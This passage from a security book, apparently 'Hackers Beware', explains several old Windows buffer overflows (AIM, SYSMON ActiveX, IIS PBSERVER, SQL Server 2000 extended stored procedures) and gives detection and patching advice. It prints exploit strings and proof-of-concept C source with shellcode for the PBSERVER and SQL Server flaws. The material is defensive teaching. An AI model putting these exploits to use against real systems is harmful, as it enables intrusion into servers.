Hackers Beware

Each time, after you launch AIM, you can also delete the Registry key at HKEY_CLASSES_ROOT\aim\shell\open\command because AIM rewrites the key each time it is launched.

Source Code/Pseudo Code

The following is the string of information that is sent to the program to cause this exploit:

aim:buddyicon?screenname=abob&groupname=asdf&Src=http://localh

ost/AAA...

Additional Information

Additional information for this exploit can be found at www.atstake.com.

Microsoft Windows 2000 ActiveX Control Buffer Overflow

An unchecked buffer exists in the System Monitor ActiveX Control included with Microsoft Windows 2000 (SYSMON.OCX, classid:C4D2D8E0-D1DD- 11CE-940F-008029004347). Depending on the data entered when invoking the ActiveX control, an attacker can either launch a Denial of Service attack or execute arbitrary code on a remote system. This can be exploited remotely through a web browser or an HTML-compliant email, only if ActiveX is enabled in the browser or mail client. Unfortunately most browsers are configured to allow ActiveX to run.

Exploit Details:

•Name: Microsoft Windows 2000 ActiveX Control Buffer Overflow

•Operating System: Windows 2000

•Protocols/Services: ActiveX compliant and installed mail clients and Web browsers

How It Works

The exploit is in the LogFileName parameter that is supplied to the ActiveX control. If the length of the data entered as this value is longer than 2000 characters, memory containing executable code is overwritten with the remotely supplied data. This data is executed at the current logged on user’s privilege level.

How to Use It

For an attacker to use the exploit, he must either send the corrupt *.ASX file to a client via an ActiveX enabled web client or have the corrupt *.ASX file as part of a web site for download.

How to Protect Against It

The best way to protect against this exploit is to inform users not to download, click, or open any ASX files that are unknown to them. It is also important that browsers are properly configured to block this type of traffic, because the exploit can run in the background without the user knowing about it.

Additional Information

Source code and additional information can be found at the following sites:

•http://www.ussrback.com/microsoft/msmactivex.html

•http://www.ussrback.com/microsoft/msmactivex2.html

•www.securityfocus.com

•www.microsoft.com

IIS 4.0/5.0 Phone Book Server Buffer Overflow

A buffer overflow condition exists in PBSERVER.DLL, which is the phone book service for AOL’s instant messenger,that can allow the remote execution of code or a Denial of Service attack.

Exploit Details:

•Name: IIS 4.0/5.0 Phone Book Server Buffer Overflow

•Operating System: Windows NT 4.0 and Windows 2000

•Protocols/Services: Microsoft’s Phone Book Server on IIS 4.0 and 5.0

How It Works

The overflow occurs when the PB parameter of the query string is too long. Filling this parameter with uppercase As causes the inetinfo process to crash the victim’s system.

How to Use It

To begin, the ESI register has to be filled with the user-supplied As. The ESI register then has to be set somewhere in memory where it can be read, but the attacker has to be careful to make sure it does not crash the machine. A roundabout way to do this is to go through the code and set ESI to an address that contains a pointer to the user-supplied buffer that causes it to be eventually called. After that, the ESI is set to 0x5E9351E4. This address has a pointer back to the user supplied buffer, which floats around the 0x0027**** area. This 0x0027**** address is then moved into the EAX register. If the value at address 0x0027**** is set to

0x5e93554c, when what the EAX points to is moved into the ECX and ECX+1Ch is called, it lands a couple of bytes above the user-supplied buffer.

Signature of the Attack

There are no proven ways to verify this attack. An administrator can watch for repeated crashes of the Inetinfo service. If this occurs, the system should be patched to avoid this vulnerability.

How to Protect Against It

If you do not need the Phone Book Service, you should remove PBSERVER.DLL. Users of the Phone Book Service should download and install the patch provided by Microsoft.

Source Code/Pseudo Code

The source code can be downloaded from http://www.atstake.com/research/advisories/2000/pbserver-poc.c.

The following is part of the code taken from atstake’s web site and shows the procedure that fills the buffer with As:

int CheckWeb(int port)

{

int snd, rcv, err, count =0,incount = 0;

/* the following line may wrap */ char *buffer="GET

/pbserver/pbserver.dll?OSArch=0&OSType=2&LCID=EEEEEEEEEEEEEEEE EEEEEEEEEEEEEEEEEEEE EEEEEEEE&OSVer=%55%8B%EC%90%90%90%90%90%bb%ff%ff%ff%ff%83%eb%8 b%53%68%6e%2e%74%78% 68%76%6f%72%75%68%20%70%73%72%68%69%72%20%3e%68%2f%63%20%64%90 %90&CMVer=%68%65%78% 65%20%68%63%6d%64%2e%B8%86%a9%f1%77%8b%dc%33%f6%56%53%ff%d0%90 %90DDDDDDDDDDDDDDDDD DD&PBVer=&0PB=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAA%4c%55%93%5e%cc%ccAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAA%e4%51%93%5ennnn HTTP/1.1\r\nHost: 127.0.0.1\r\n\r\n";

sa.sin_port=htons(port); sock=socket(AF_INET,SOCK_STREAM,0); bind(sock,(struct sockaddr *)&sa,sizeof(sa));

if (sock==INVALID_SOCKET)

{

closesocket(sock); return 0;

}

if(connect(sock,(struct sockaddr *)&sa,sizeof(sa)) < 0)

{

closesocket(sock); printf("Failed to connect\n"); return 0;

}

else

{

snd = send(sock,buffer,strlen(buffer),0); printf("Buffer sent.\n");

}

closesocket(sock); return 0;

}

Additional Information

Additional information can be found at the following sites:

•http://www.securityfocus.com

•http://www.atstake.com

•http://www.microsoft.com

SQL Server 2000 Extended Stored Procedure

SQL Server provides a mechanism through which a database query can result in a call into a function called an extended stored procedure. Several of the extended stored procedures supplied with SQL Server 2000 are vulnerable to buffer overflow attacks, and in a default configuration, these extended stored procedures can be executed by an unauthorized user.

Exploit Details:

•Name: SQL Server 2000 Extended Stored Procedure

•Operating System: Windows 2000 Advanced Server

•Protocols/Services: SQL Server 2000 Enterprise Edition

How It Works

Extended stored procedures can be called by a client component that can issue a normal SQL Server query, such as Microsoft Access, ISQL, or MSQuery. Web applications running on Internet Information Server can use the ActiveX Data Objects API to connect to SQL Server databases.

How to Use It

The syntax for calling extended stored procedures is: exec , , ...

For example, the following query returns a directory tree of the c:\winnt directory:

exec xp_dirtree 'c:\winnt'

By passing extremely long strings for various parameters, an attacker can overrun the buffer space allocated for these parameters and execute arbitrary code.

The following extended stored procedures are vulnerable:

•xp_peekqueue (XPQUEUE.DLL), and xp_printstatements (XPREPL.DLL). A long string passed for the first parameter causes an access violation and overwrites the exception handler’s saved return address.

•xp_proxiedmetadata (XPREPL.DLL). Takes four parameters. A long string for the second parameter causes an access violation and overwrites the exception handler’s saved return address.

•xp_SetSQLSecurity (XPSTAR.DLL). Takes four parameters. A long string passed for the third parameter causes an exception that results in the immediate termination of the entire SQL Server process.

Signature of the Attack

It order to detect this attack you need to be able to analyze the packets as they cross the network and look for unique signatures that are specific to the exploit. In this case you would look for long strings inside of ESPs aimed at the SQL server. Once these packets were found you would identify the source IP address and block those addresses.

How to Protect Against It

Disallow PUBLIC execute access to these extended stored procedures unless you need it. If you cannot do this, install the vendor-supplied patch.

Source Code/Pseudo Code

Source code for this exploit was created by and can be found at http://www.atstake.com/research/advisories/2000/sqladv2-poc.c.

I am including the source code for this exploit because it is not very long and it illustrates that it does not take a lot of code to run an exploit. In some cases, since exploit code is not that long, this allows attackers to produce code for a large number of exploits in a short period of time.

//SQL2KOverflow.c

//This code creates a file called 'SQL2KOverflow.txt' in the root of the// c:

drive.

#include

#include

#include

#include

#include

#include

int Syntax()

{

printf( "Syntax error. Correct syntax is:\nSQL2KOverflow ");

return 1;

}

int main(int argc, char *argv[])

{

char szBuffer[1025]; SWORD swStrLen; SQLHDBC hdbc; SQLRETURN nResult; SQLHANDLE henv; HSTMT hstmt;

SCHAR InConnectionString[1025] = "DRIVER={SQL Server};SERVER=";

UCHAR query[20000] = "exec xp_proxiedmetadata 'a', '"; int count;

if ( argc != 4 )

{

return Syntax();

}

if ( ( strlen( argv[1] ) > 250 ) ||

( strlen( argv[2] ) > 250 ) || ( strlen( argv[3] ) > 250 ) ) return Syntax();

strcat( InConnectionString, argv[1] ); strcat( InConnectionString, ";UID=" ); strcat( InConnectionString, argv[2] ); strcat( InConnectionString, ";PWD=" ); strcat( InConnectionString, argv[3] );

strcat( InConnectionString, ";DATABASE=master" );

for ( count = 30; count < 2598; count++ ) query[count] = (char)0x90;

query[count] = 0;

// 0x77782548 = wx%H = this works sp0 strcat( query, "\x48\x25\x78\x77" ); strcat( query,

"\x90\x90\x90\x90\x90\x33\xC0Ph.txthflowhOverhQL2khc:\\STYPP@P

HPPPQ\xB8\x8D+\xE9\x

77\xFF\xD0\x33\xC0P\xB8\xCF\x06\xE9\x77\xFF\xD0"

);

strcat( query, "', 'a', 'a'" );

if (SQLAllocHandle(SQL_HANDLE_ENV,SQL_NULL_HANDLE,&henv)

!= SQL_SUCCESS)

{

printf("Error SQLAllocHandle"); return 0;

}

if (SQLSetEnvAttr(henv, SQL_ATTR_ODBC_VERSION,(SQLPOINTER) SQL_OV_ODBC3, SQL_IS_INTEGER) != SQL_SUCCESS)

{

printf("Error SQLSetEnvAttr"); return 0;

}

if ((nResult = SQLAllocHandle(SQL_HANDLE_DBC,henv,(SQLHDBC FAR *)&hdbc)) != SQL_SUCCESS)

{

printf("SQLAllocHandle - 2");

return 0;

}

nResult = SQLDriverConnect(hdbc, NULL, InConnectionString,

strlen(InConnectionString), szBuffer, 1024, &swStrLen, SQL_DRIVER_COMPLETE_REQUIRED);

if(( nResult == SQL_SUCCESS ) | ( nResult == SQL_SUCCESS_WITH_INFO) )

{

printf("Connected to MASTER database...\n\n"); SQLAllocStmt(hdbc,&hstmt);

}

if(SQLExecDirect(hstmt,query,SQL_NTS) ==SQL_SUCCESS)

{

printf("\nSQL Query error");

return 0;

}

printf("Buffer sent...");

return 0;

}

Additional Information

Additional information can be found at www.atstake.com.

Protection Against Buffer Overflow Attacks

Buffer overflow vulnerabilities are inherent in code, due to poor or no error checking. Therefore, anything that can be done to protect against buffer overflows must be done external to the software application, unless you have the source code and can re-code the application correctly. Things that can be done to defend against each specific buffer overflow are covered in their previous, respective sections.

Because new buffer overflow attacks come out often, the following list is meant to provide general ways you can protect yourself against buffer overflow attacks:

•Close the port or service.

•Apply the vendor’s patch or install the latest version of the software.

•Filter specific traffic at the firewall.

•Test key applications.

•Run software at the least privilege required.

Close the Port or Service

The easiest way to protect against a buffer overflow attack is to remove the software that is vulnerable. In cases where the software was installed by default and is not being used or is not required in a particular environment, the software and all corresponding ports and services should be closed or removed. Often, I see systems that are vulnerable, and the point of vulnerability is extraneous software that should not be running on the machine. In several cases, the administrator does not even know that it is installed.

The first rule of thumb of security is to know what is installed on your systems and have the least amount of services running and ports open that are required for the system to operate in a specific environment.

Apply the Vendor Patch

In most cases, shortly after a buffer overflow vulnerability is announced, the vendor either releases a patch or updates the software to a new version. In either case, the vendor usually adds the proper error checking into the program. By far, this is the best way to defend against a buffer overflow. The other defense mechanisms covered in this chapter help minimize a company’s exposure points, but they do not fix the problem.

Filter Specific Traffic at the Firewall

Most companies are concerned about an external attacker breaching a company’s security via the Internet and compromising a machine using a buffer overflow attack. In this case, an easy preventative mechanism is to block the traffic of the vulnerable software at the firewall. The system is still vulnerable to a buffer overflow attack; you are just stopping attackers from getting to the machine and exploiting it. If a company does not have internal firewalls, this does not prevent an insider from launching a buffer overflow attack against a specific system.

Test Key Applications

The best way to defend against buffer overflow attacks is to be proactive. Why wait for an attacker to discover a buffer overflow exploit and compromise your machine when you can test the software beforehand? This is not practical for all software, because it would take too long, but for key applications, it might be worth the extra effort to see if the software is vulnerable. If the system asks for a username, type in 200

characters or values it is not expecting and see what happens. You might be surprised at how vulnerable certain systems are to this type of attack.

The scary thing about buffer overflow exploits is that they can be present in a piece of software for ten years without creating a problem. No one realizes there is vulnerability until an attacker decides to test the limits of the software. For mission critical applications, don’t you want to know about the weakness before an attacker points it out to you?

Run Software at the Least Privilege Required

By running software at the least privilege required, you make sure that any software running on a system is properly configured. Often, especially on UNIX machines, administrators have too much to do and do not have the time to properly configure a system. In these cases, to get the system running in as a short a period as possible, they just install and configure applications or processes as root. This is a quick and easy way to guarantee that the process will have access to the resources it needs to run properly. It is also a quick and easy way to guarantee that your systems will be quite vulnerable and an easy target for attackers.

Especially with buffer overflow attacks, it is critical that all software be properly configured to run with the least amount of privilege as possible. This way, even if an attacker can exploit the system, you limit the amount of access he has.

Remember the principle of least privilege (POLP) when implementing security across your entire organization. POLP states that anything running on your systems, or anyone who will be using the systems, should be given the least amount of privilege necessary to perform their function, and nothing else.

Summary

Buffer overflow attacks are very dangerous, with the resulting damage ranging from crashing a machine to gaining root/administrator access. Because these types of attacks are not caused by systems that are configured incorrectly, but by programming mistakes on the part of the developers, whenever you use software, you are putting blind trust that the vendor coded the application correctly. In cases where vendor developers did not code it correctly, you might not realize the problem for several years. This can be very dangerous because when people use software over a long period of time, they get a false sense of security that it is secure, when in reality, it can be quite vulnerable.

Therefore, it is critical that administrators understand how buffer overflow attacks work and realize that just because a system is secure today does not mean it will be secure tomorrow. Companies must take precautions by limiting what services are running and what ports are opened, and implement a policy of least privilege. This way, even if a piece of software is found to be vulnerable to a buffer overflow attack, the exposure is limited